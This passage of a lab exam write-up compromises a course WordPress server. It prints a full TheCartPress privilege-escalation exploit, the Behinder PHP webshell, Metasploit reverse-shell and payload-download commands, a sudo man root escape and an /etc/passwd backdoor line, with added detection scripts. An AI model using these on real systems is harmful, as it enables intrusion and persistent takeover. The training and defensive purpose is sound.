Continued from the previous part

0x01. Exam target

3. Summary

  • WordPress: 6.5.2

  • Theme: amberd-online-store

  • Plugins: thecartpress

02. Vulnerability search

1. Search Google for plugin vulnerabilities

thecartpress exploit

A PoC for the plugin was found on exploit-db.

03. Exploitation

1. PoC

# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import sys
import requests


def print_banner():
    print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
    print("Author -> space_hen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url]")
    print("Ex: python3 exploit.py https://example.com")


def vuln_check(uri):
    # An empty GET to the AJAX action returns the plugin's own validation
    # error, which shows the handler is reachable without a WordPress session.
    response = requests.get(uri)
    return "User name is required" in response.text


def main():
    print_banner()
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    # Strip a trailing slash so the path below is not doubled.
    base = sys.argv[1].rstrip('/')

    # The registration handler is exposed to unauthenticated users through
    # admin-ajax.php and trusts the client-supplied tcp_role value.
    ajax_action = 'tcp_register_and_login_ajax'
    admin = '/wp-admin/admin-ajax.php'

    uri = base + admin + '?action=' + ajax_action
    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    data = {
        "tcp_new_user_name": "admin_03",
        "tcp_new_user_pass": "admin1234",
        "tcp_repeat_user_pass": "admin1234",
        "tcp_new_user_email": "test@test.com",
        "tcp_role": "administrator",
    }
    print("Inserting admin...")
    response = requests.post(uri, data=data)
    # On success the handler echoes an empty JSON string: ""
    if response.text == "\"\"":
        print("Success!")
        print("Now login at /wp-admin/")
    else:
        print(response.text)


if __name__ == "__main__":
    main()

2. exploit

  • Username to create (tcp_new_user_name): admin_03

  • Password for the new user (tcp_new_user_pass): admin1234

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 rce.py http://cms.comp7904.hku/
TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation
Author -> space_hen (www.github.com/spacehen)
Inserting admin...
Success!
Now login at /wp-admin/
  • User created: admin_03/admin1234

  • Login page: http://cms.comp7904.hku/wp-admin/
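The exploit above is noisy in the web server log: its probe is a GET and the account creation a POST, both to admin-ajax.php with the action name in the query string (the POST body with tcp_role is not logged, but the query string is). The following detection script is an added example, not part of the original writeup or the exploit; the Apache combined-format log lines are constructed here for illustration and the action list is only the one used by this PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined format); not from the exam host.
SAMPLE_LOG = """\
10.16.0.135 - - [10/May/2024:14:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=tcp_register_and_login_ajax HTTP/1.1" 200 23 "-" "python-requests/2.31.0"
10.16.0.135 - - [10/May/2024:14:02:12 +0000] "POST /wp-admin/admin-ajax.php?action=tcp_register_and_login_ajax HTTP/1.1" 200 2 "-" "python-requests/2.31.0"
10.16.0.50 - - [10/May/2024:14:05:40 +0000] "GET /wp-content/themes/amberd-online-store/style.css HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.16.0.135 - - [10/May/2024:14:07:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# admin-ajax actions that create accounts without a session. Only the action
# from the TheCartPress PoC is listed; extend with other known-bad actions.
SUSPICIOUS_ACTIONS = {"tcp_register_and_login_ajax"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def find_ajax_abuse(log_text):
    """Return (ip, timestamp, method, action, status) for requests to a suspicious action.

    The 2-byte POST response ("" in JSON) is the success marker the PoC checks for.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/wp-admin/admin-ajax.php"):
            continue
        action = rec["query"].get("action")
        if action in SUSPICIOUS_ACTIONS:
            hits.append((rec["ip"], rec["ts"], rec["method"], action, rec["status"]))
    return hits


if __name__ == "__main__":
    for hit in find_ajax_abuse(SAMPLE_LOG):
        print(hit)
```

A GET followed within seconds by a POST to the same action from one source, as in the sample, is the exact sequence the PoC produces; a single POST with a 2-byte 200 response is enough on its own to go and check the wp_users table for a new administrator.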

3. getshell

Editing the code of the installed theme did not work in testing, so a fresh theme was uploaded instead:

  • Download a new theme from wordpress.org

  • Replace the theme's code with shell code

  • Upload the new theme at http://cms.comp7904.hku/wp-admin/theme-install.php?browse=popular

  • Activate the new theme at http://cms.comp7904.hku/wp-admin/themes.php

4. Connect to the webshell

  • Shell: http://cms.comp7904.hku/wp-content/themes/twentytwentyfour/functions.php?cmd=phpinfo();

  • Connect to the shell with AntSword (蚁剑)

04. Exam requirements

1. Get the first flag

  • /var/www/wordpress/local.txt

  • Flag_local_723be47accY3Z6amlkYW1kbmFq3a519d

0x04 Post-exploitation

00. Host information

Server: 10.16.0.134
Kali: 10.16.0.135
Hack-Win: 10.16.0.129

01. Reverse shell to MSF (Metasploit Framework)

Behinder's reverse-shell module is used here.

1. Set up the MSF handler

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444 

2. Connect to the shell with Behinder (冰蝎)

  • Create shell.php in the web root /var/www/wordpress/ containing the Behinder webshell:

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // first 16 characters of the MD5 of the connection password; default password is rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        // fallback when openssl is missing: base64, then XOR with the key
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>
  • Shell: http://cms.comp7904.hku/shell.php

  • Password: rebeyond

  • Use the shell's reverse-connect module

  • IP address: the Kali IPv4 address

  • Port: 4444
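The webshell above derives its key from the connection password (first 16 hex characters of md5(password)) and, when the openssl extension is absent, accepts base64(plaintext XOR key) with the key index shifted by one (in PHP `$i+1&15` is `($i+1)&15`, since `+` binds tighter than `&`). The plaintext is `func|php_code`, and because `explode('|')` splits on every pipe, code containing a `|` is truncated by this shell. The following Python is an added example, not Behinder's client or the original writeup's code; it reproduces the key derivation and the no-openssl transport so a captured request body can be decoded, and does not implement the AES path.

```python
import base64
import hashlib


def behinder_key(password):
    """Session key used by the shell: first 16 hex chars of md5(password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16]


def xor_transform(data, key):
    """Mirror of the PHP loop: byte i is XORed with key[(i+1) & 15]."""
    kb = key.encode()
    return bytes(b ^ kb[(i + 1) & 15] for i, b in enumerate(data))


def encode_request(php_code, key, func="assert"):
    """Client side (no-openssl path): 'func|code' -> XOR -> base64 request body."""
    plain = f"{func}|{php_code}".encode()
    return base64.b64encode(xor_transform(plain, key)).decode()


def decode_request(body, key):
    """Server side as shell.php does it: base64-decode, XOR, explode on '|'.

    Returns (func, params); params is only the segment after the first pipe,
    exactly as $arr[1] would be.
    """
    plain = xor_transform(base64.b64decode(body), key).decode()
    parts = plain.split("|")
    return parts[0], parts[1]


if __name__ == "__main__":
    key = behinder_key("rebeyond")
    body = encode_request("echo shell_exec('id');", key)
    print(key)
    print(body)
    print(decode_request(body, key))
```

For incident response the useful direction is decode_request: given the password (or the key lifted from the PHP file on disk) and a request body from the access log or a packet capture, it yields the PHP the attacker had the server eval().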

3. Upgrade the PHP meterpreter to a Linux meterpreter

  • On Kali Linux

MSF settings

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444 

Generate the ELF payload. Note that the payload name below, linux/x64/meterpreter_reverse_tcp (underscore), is the stageless variant, while the handler above was set to the staged linux/x64/meterpreter/reverse_tcp; these are different payloads, so set the handler to the same name as the one passed to msfvenom.

┌──(kali㉿kali)-[~/Downloads]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.16.0.135 LPORT=4444 -f elf > mshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes

Start a Python http.server to host the payload

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server

Download the payload onto the target from inside Behinder

wget http://10.16.0.135:8000/mshell.elf

Make it executable and run it

chmod +x ./mshell.elf
./mshell.elf

02. Privilege escalation

1. Get a TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > shell
Process 3024 created.
Channel 61 created.
python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@comp7904:~/wordpress$ whoami
whoami
www-data

2. List the commands that may be run as root

sudo -l

www-data@comp7904:~/wordpress$ sudo -l
sudo -l
Matching Defaults entries for www-data on comp7904:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on comp7904:
    (root) NOPASSWD: /usr/bin/man
  • /usr/bin/man may be run as root without a password

3. Escalate via /usr/bin/man

sudo man man

www-data@comp7904:~/wordpress$ sudo man man
sudo man man
WARNING: terminal is not fully functional
Press RETURN to continue 

Press Enter to continue

MAN(1)                        Manual pager utils                        MAN(1)

NAME
       man - an interface to the system reference manuals

SYNOPSIS
       man [man options] [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [man options] [section] term ...
       man -f [whatis options] page ...
       man -l [man options] file ...
       man -w|-W [man options] page ...

DESCRIPTION
       man  is  the system's manual pager.  Each page argument given to man is
       normally the name of a program, utility or function.  The  manual  page
       associated with each of these arguments is then found and displayed.  A
       section, if provided, will direct man to look only in that  section  of
       the  manual.   The  default action is to search in all of the available
       sections following a pre-defined order (see DEFAULTS), and to show only
       the first page found, even if page exists in several sections.

       The table below shows the section numbers of the manual followed by the
 Manual page man(1) line 1 (press h for help or q to quit)h
...skipping...

                   SUMMARY OF LESS COMMANDS

      Commands marked with * may be preceded by a number, N.
      Notes in parentheses indicate the behavior if N is given.
      A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K.

  h  H                 Display this help.
  q  :q  Q  :Q  ZZ     Exit.
 ---------------------------------------------------------------------------

                           MOVING

  e  ^E  j  ^N  CR  *  Forward  one line   (or N lines).
  y  ^Y  k  ^K  ^P  *  Backward one line   (or N lines).
  f  ^F  ^V  SPACE  *  Forward  one window (or N lines).
  b  ^B  ESC-v      *  Backward one window (or N lines).
  z                 *  Forward  one window (and set window to N).
  w                 *  Backward one window (and set window to N).
  ESC-SPACE         *  Forward  one window, but don't stop at end-of-file.
  d  ^D             *  Forward  one half-window (and set half-window to N).
  u  ^U             *  Backward one half-window (and set half-window to N).
  ESC-)  RightArrow *  Right one half screen width (or N positions).
  ESC-(  LeftArrow  *  Left  one half screen width (or N positions).
HELP -- Press RETURN for more, or q when done

Type !/bin/bash to get a bash shell: man hands the page to the pager (less), which runs the command as the root user that sudo started it as

HELP -- Press RETURN for more, or q when done!/bin/bash
!/bin/bash
root@comp7904:/var/www/wordpress# 

Check the current user

root@comp7904:/var/www/wordpress# whoami
whoami
root

4. Maintain root access

  • Append a line to /etc/passwd to add a user kali/kali with UID 0, i.e. root privileges

echo "kali:$(openssl passwd kali):0:0:root:/root:/bin/bash" >> /etc/passwd
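Both the sudo -l result and the /etc/passwd line above leave plain-text artefacts that a defender can audit in seconds. The following script is an added example, not part of the original writeup: it flags UID 0 accounts other than root and password hashes stored directly in /etc/passwd (where the appended line puts one), and parses sudo -l output for rules whose binary can escape to a shell. Both sample inputs are constructed here in the same shape as the output shown above; the hash value and the list of shell-escaping binaries are illustrative.

```python
import re

# Constructed sample of /etc/passwd after the persistence step (not a real host's file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
kali:$1$saltsalt$hashhashhashhashhashhash:0:0:root:/root:/bin/bash
"""

# Constructed sample of `sudo -l` output, same layout as the one shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on comp7904:
    env_reset, mail_badpass, use_pty

User www-data may run the following commands on comp7904:
    (root) NOPASSWD: /usr/bin/man
    (root) /usr/bin/apt-get
"""

# Binaries that spawn a shell when run under sudo (a subset of GTFOBins).
SHELL_ESCAPE_BINS = {"man", "less", "more", "vi", "vim", "find", "awk", "python3"}


def passwd_findings(passwd_text):
    """Return (account, reason) for UID 0 accounts other than root and for
    accounts whose password field holds a hash instead of 'x' (shadow marker)."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0"))
        if pw not in ("x", "*", "!", ""):
            findings.append((name, "hash in /etc/passwd"))
    return findings


# One sudoers rule as sudo -l prints it: "(runas) [TAG: ...] cmd[, cmd...]"
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def risky_sudo_rules(sudo_l_text):
    """Return (runas, nopasswd, binary) for rules whose binary can escape to a shell."""
    out = []
    for line in sudo_l_text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            binary = cmd.strip().split()[0]
            if binary.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
                out.append((m.group("runas"), nopasswd, binary))
    return out


if __name__ == "__main__":
    print(passwd_findings(SAMPLE_PASSWD))
    print(risky_sudo_rules(SAMPLE_SUDO_L))
```

On the exam host the first function would report the kali account twice (UID 0 and a hash in /etc/passwd) and the second would return the (root, NOPASSWD, /usr/bin/man) rule that made the escalation possible; the fix for the latter is to drop the rule or replace man with a wrapper that disables the pager.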

5. Get the second flag

  • /root/root.txt

  • Flag_root_608b2llb3dlamtu011e4573a3655fcfc2fee

root@comp7904:/var/www/wordpress# cd /root
cd /root
root@comp7904:~# ls
ls
root.txt  snap
root@comp7904:~# cat root.txt
cat root.txt
Flag_root_608b2llb3dlamtu011e4573a3655fcfc2f